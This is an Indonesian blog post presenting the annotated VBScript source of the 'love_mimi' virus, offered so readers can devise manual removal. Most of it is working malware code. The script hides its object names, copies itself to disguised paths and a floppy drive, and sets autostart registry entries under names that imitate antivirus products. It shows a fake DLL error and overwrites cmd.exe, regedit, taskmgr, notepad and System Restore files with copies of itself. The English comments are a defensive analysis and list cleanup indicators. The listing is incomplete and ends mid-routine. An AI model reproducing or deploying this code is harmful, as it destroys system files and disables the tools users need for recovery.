
Source Code virus love_mimi

Written By MUHAMAD IRFAN on Monday 20 December 2010 | 02:39

Nampaknya saya gak sempat dan tidak akan sempat membuat analisis virus bandel yang satu ini. Tapi saya harap, dengan memposting source code ini, ada di antara teman-teman yang mau membuat cara manual removal-nya. Dengan source code ini Anda bisa melihat langsung badan virus dan apa saja yang dilakukannya, sehingga dapat melakukan pembersihan manual.
wassalam
--------------------------------[mulai]-----------------------
' Setup section of the posted script: creates the two COM objects it works with, defines
' its drop paths, copies the running script to two locations and reads the Run value that
' the next section compares against.
'
' The COM ProgIDs are stored reversed and rebuilt with StrReverse, so the plain names never
' appear in the file (presumably to get past simple string matching -- when searching a
' disk for copies of this script, search for the reversed literals too).
' "tcejbOmetsySelif.gnitpircS" reversed is the ProgID Scripting.FileSystemObject
' (ProgID lookup ignores case); it is used for every CopyFile call.
Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))

' "llehS.tpircSW" reversed is WScript.Shell; it is used for the registry reads and writes.
Set dear = createobject(StrReverse("llehS.tpircSW"))

' Path variables. In the part of the script visible on this page, qi, heiji, forest and han
' are assigned but never referenced again, and syau only appears inside one Run value;
' none of these five paths is written to by the visible code.
qi = "c:\regedit.vbs"

syau = "c:\mymimi.vbs"

heiji = "c:\notepad.vbs"

forest = "c:\antivirus.vbs"

han = "c:\windows\svchost.exe"

' Drop path 1: note the digit 0 in EXPL0RER, imitating the name "EXPLORER".
tachoor = "c:\windows\EXPL0RER.vbs"

' Drop path 2: sits in c:\windows\system (not system32).
mimi = "c:\windows\system\WinUpdt.vbs"

' Runtime errors are suppressed from here on, so a failed copy or registry call does not
' stop the script. The statement is repeated before almost every action below.
on error resume next

' Copy the currently running script file to drop path 1.
love.CopyFile wscript.scriptfullname, tachoor

on error resume next

' Copy the currently running script file to drop path 2.
love.CopyFile wscript.scriptfullname, mimi

on error resume next

' Read the Run value "Kernell32" (spelled with a double l). With errors suppressed, a
' missing value leaves iqra empty, so the comparison that follows treats the machine as
' not yet set up.
iqra = dear.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32")

' Main branch. The Run value "Kernell32" acts as the marker: if it does not already hold
' "c:\windows\svchost.exe " followed by the EXPL0RER.vbs path, the first-run branch executes;
' otherwise the shorter "else" branch runs on every later start.
'
' Indicators for manual cleanup, all taken from the lines below:
'   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run         values Kernell32, AVGuard32, PCMAVscanner
'   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices value SVCH0ST (digit 0)
'   every destination path passed to CopyFile; each one ends up holding a copy of the
'   script text, so system files listed here must be restored from known-good media
'   rather than merely "disinfected".
' NOTE(review): all four autostart entries launch c:\windows\svchost.exe, which is not the
' normal location of svchost.exe (system32). Nothing on this page creates that file, so
' where it comes from cannot be told from here -- treat it as suspect and verify.
If iqra <> "c:\windows\svchost.exe " & tachoor then

on error resume next

' Writes a Windows Script Host "Timeout" setting of 0 (in WSH, 0 means no script time limit).
' NOTE(review): the key is printed here as "Windows ScriptingHost"; the usual WSH settings
' key is "Windows Script Host". The page may have lost a space -- check both when cleaning.
dear.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptingHost\Settings\Timeout", 0, "REG_DWORD"

' Persistence: three Run values with security-product-like names, each starting one script path at logon.
' Kernell32 -> EXPL0RER.vbs; this is also the marker value tested above.
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32", "c:\windows\svchost.exe " & tachoor

' AVGuard32 -> c:\windows\system\WinUpdt.vbs
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVGuard32", "c:\windows\svchost.exe " & mimi

' PCMAVscanner -> c:\mymimi.vbs (a path the visible code never writes).
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCMAVscanner", "c:\windows\svchost.exe " & syau

' Decoy: a fake "Bad Image" error box (16 = critical icon, OK button). The text contains the
' misspelling "againts", which is a handy string to recognise this script by.
done = MsgBox("The application or DLL C:\WINDOWS\system32\MSVBVM60.DLL is not a valid Windows image. Please check this againts your installation diskette.", 16, "msvbvm60.dll - Bad Image")

' Fourth autostart entry, under RunServices, named SVCH0ST with a digit 0.
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\SVCH0ST", "c:\windows\svchost.exe " & mimi

' Removable-media copy: drive A: under a diary-like name with a .vbe extension.
love.CopyFile wscript.scriptfullname, "A:\diary_rahmi.vbe"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

' From here to the end of the branch the script copies itself over Windows files.
' CopyFile is called without its overwrite argument, which defaults to True, so an existing
' destination is replaced; a copy that fails (for example a locked file) is silently
' skipped because errors are suppressed.
' Targets: Visual Basic runtime DLLs and an installer DLL...
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm50.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msihnd.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvnvvm60.dll"

on error resume next

' ...then the tools a user would normally reach for to investigate or clean up: task
' manager, notepad, registry editors, command interpreters, control panel, installer.
' Several names (R.com, REGEDIT.com, T.com, TASKMGR.com) look like renamed copies of those
' tools -- presumably renames suggested by removal guides; verify.
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\TASKMAN.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\NOTEPAD.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\R.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\REGEDIT.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\regedit.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\nusrmgr.cpl"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\cmd.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\control.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msiexec.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\regedt32.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\taskman.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\taskmgr.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\command.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\T.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\TASKMGR.com"

on error resume next

' Files under system32\Restore (System Restore), so that recovery path is affected as well.
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\rstrui.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\srdiag.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\srframe.mmf"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\rstrlog.dat"

on error resume next

' Three further routines are called here. Their definitions are not included in the part of
' the script shown on this page, so what they do cannot be stated from this listing.
cdrsqnx()

dwozmc()

ontrus()

else

' Marker already present: runs on later starts. It re-creates a subset of the copies, which
' means deleting single files without first stopping the script and removing the autostart
' entries will not hold.
on error resume next

' Removable-media copy again, this time as diary_mimi.vbs.
love.CopyFile wscript.scriptfullname, "A:\diary_mimi.vbs"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

' Additional persistence not set in the first-run branch: a copy in the All Users Startup
' folder, named to resemble an antivirus component.
love.CopyFile wscript.scriptfullname, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\PCMAVExtMonitor.vbs"

on error resume next

' Re-copies over the runtime DLLs and nusrmgr.cpl (system32\msvbvm60.dll appears twice).
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm50.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvnvvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\nusrmgr.cpl"

on error resume next

' hcdmshsx is called only in this branch; its Sub starts right after the If block but is
' cut off on this page. The other three routines are not defined in the visible listing.
hcdmshsx()

cdrsqnx()

dwozmc()

ontrus()

End if

Sub hcdmshsx()

Dim married

on error resume next

married = "


my_mimi

muka bego!! ngapain mandangin kompie ini trus2an!? cari dong anti virusnya!!


klik di sini!


